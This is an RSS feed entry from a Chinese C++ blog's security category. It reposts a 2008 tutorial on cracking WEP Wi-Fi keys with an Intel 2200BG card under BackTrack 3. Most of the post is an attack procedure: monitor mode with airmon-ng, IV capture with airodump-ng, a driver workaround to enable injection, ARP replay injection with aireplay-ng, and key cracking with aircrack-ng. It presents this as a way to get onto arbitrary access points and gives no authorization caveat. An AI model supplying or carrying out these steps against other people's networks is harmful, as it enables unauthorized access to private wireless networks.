﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>C++博客-Think&lt;Br&gt;-随笔分类-网络安全</title><link>http://www.cppblog.com/think/category/8896.html</link><description>&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;宁静致远,淡泊明志</description><language>zh-cn</language><lastBuildDate>Mon, 29 Dec 2008 04:43:28 GMT</lastBuildDate><pubDate>Mon, 29 Dec 2008 04:43:28 GMT</pubDate><ttl>60</ttl><item><title>【转帖】Intel 2200bg注入式破解wep简明教程</title><link>http://www.cppblog.com/think/archive/2008/11/21/67489.html</link><dc:creator>think</dc:creator><author>think</author><pubDate>Fri, 21 Nov 2008 06:25:00 GMT</pubDate><guid>http://www.cppblog.com/think/archive/2008/11/21/67489.html</guid><wfw:comment>http://www.cppblog.com/think/comments/67489.html</wfw:comment><comments>http://www.cppblog.com/think/archive/2008/11/21/67489.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cppblog.com/think/comments/commentRss/67489.html</wfw:commentRss><trackback:ping>http://www.cppblog.com/think/services/trackbacks/67489.html</trackback:ping><description><![CDATA[感谢liyg<br>转自中国无线门户,原文地址：http://www.anywlan.com/bbs/dispbbs.asp?BoardID=15&amp;replyID=69593&amp;id=9459&amp;skin=0<br><br><br><br>目前，80％的笔记本电脑内置了Intel 2200BG无线网卡，此卡性能稳定，功率大，信号好，性能稳定。但由于其在bt3下，不能直接支持注入式破解，多数人用此卡破解不成功，不得不购买所谓支持注入破解的。 <br>笔者研2200BG破究了各种用Intel 解wep的方法，近期终于活动突破性进展。终于实现&#8221;抱着笔记本即可走天下&#8220;的愿望，不敢独享，遂发帖，与各位兄弟共同学习之。 <br>1．装备： dell D410笔记本、内置Intel2200BG无线网卡，bt3中文u盘。 <br>2．启动BT3,打开一个窗口，输入ifconfig &#8211;a 查看网卡<br>3.输入airmon-ng start eth1<br><br>激活网卡的Monitor模式 <br><br><br>4.输入抓包命令，抓包并查看你要破解的ap的mac和与之相连的客户端mac。 <br>输入命令<br><br>airodump-ng --ivs -w name &#8211;c 6 eth1<br><br>，其中，eth1是你破解用的网卡接口名（下同），这样，你的窗口将显示一个工作站，可以看到你要破解的ap的essid 和mac 和与之相连接的客户端的mac。 <br><br><br>5.上面窗口不关闭，另开一个窗口，输入命令 <br>modprobe ipw2200 rtap_iface=1回车 <br>再注入 <br>iwconfig eth1 ap &lt;AP MAC&gt; <br><br><br><br>其中，ap后面跟你要破解的ap的mac，值得注意的是，这个mac必须输入中间的&#8220;：&#8221;。（如图） <br>回车后，输入 <br>iwconfig eth1 key s:fakekey <br>回车，如果输入准确无误，你已经成功的为2200打上了注入补丁，后面就可以用常规方式进行注入、破解了。 <br>6．输入aireplay-ng -3 -b ap的mac -h 客户端网卡的mac eth1<br><br>进行注入。 <br>快的一分钟，慢的5分钟，即可成功注入。 <br><br>到数据增加到1万以上时，另开窗口，启动<br>aircrack-ng -n 64 name-01.ivs<br>其中<br>64 是64位密码，如果是128位，换成128即可实现破解。 <img src ="http://www.cppblog.com/think/aggbug/67489.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cppblog.com/think/" target="_blank">think</a> 2008-11-21 14:25 <a href="http://www.cppblog.com/think/archive/2008/11/21/67489.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>